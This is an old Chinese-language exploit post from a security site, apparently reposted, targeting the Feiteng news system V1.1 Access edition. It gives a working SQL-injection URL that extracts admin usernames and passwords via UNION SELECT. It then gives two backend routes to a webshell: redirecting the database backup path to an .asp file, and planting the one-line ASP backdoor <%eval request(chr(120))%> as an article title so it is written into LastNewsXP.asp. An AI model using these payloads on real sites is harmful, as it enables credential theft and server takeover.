栏目导航: 首页 > 漏洞预警 > 程序漏洞 > 内容

沸腾新闻系统 V1.1 Access版 Finish(SP2) 注入利用

www.hx99.net    时间: 2007-07-09    阅读: 次     整理: 华西安全网
来源:C.RufusSecurityTeam
bycooldiyer

+News.asp?click=1&shu=201asNewsID,usernameastitle,3asupdatetime,passwdasclick,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29fromadminunionselecttop2

后台“图文管理”里添加文章,上传一个flash文件
点附加管理里的备份压缩
数据库地址为只读
打开恢复数据库窗口。IE输入
javascript:alert(window.frames['list'].document.forms[0].backpath.value="/data/x.asp");
就可自定义马的地址了

也可以在后台添加一个文章,标题为<%evalrequest(chr(120))%>
然后访问CreateASP.asp更新LastNewsXP.asp这个文件
后门就写到LastNewsXP.asp里面了
本文来源:华西安全网[http://www.hx99.net]
发表评论】【告诉QQ好友】【错误报告】【加入收藏】【关闭